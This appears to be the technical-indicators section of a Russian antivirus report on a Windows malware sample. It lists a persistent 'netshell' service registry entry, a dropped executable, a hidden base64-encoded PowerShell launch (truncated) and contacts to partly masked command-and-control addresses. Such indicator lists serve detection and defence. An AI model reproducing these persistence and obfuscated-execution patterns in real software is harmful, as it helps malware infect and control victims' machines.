Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\netshell] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\netshell] 'ImagePath' = '"%WINDIR%\SysWOW64\AdmTmpl\netshell.exe"'
- 'netshell' "%WINDIR%\SysWOW64\AdmTmpl\netshell.exe"
- 'netshell' %WINDIR%\SysWOW64\AdmTmpl\netshell.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...
- %HOMEPATH%\133.exe
- %WINDIR%\syswow64\admtmpl\netshell.exe
- %HOMEPATH%\133.exe в %WINDIR%\syswow64\admtmpl\netshell.exe
- '12#.#5.106.173':443
- http://12#.##.106.173:443/nvEMt/lkYCVnW84wqQZnSCRjQ/wsQvQFZl/2AHx353/nLw40rKOmh1RRhQq/Y7sKf8WBWHp5D/ via 12#.#5.106.173
- DNS ASK te###hint.com
- DNS ASK or#######onale.metodoinforma.it
- '%HOMEPATH%\133.exe'
- '%WINDIR%\syswow64\admtmpl\netshell.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)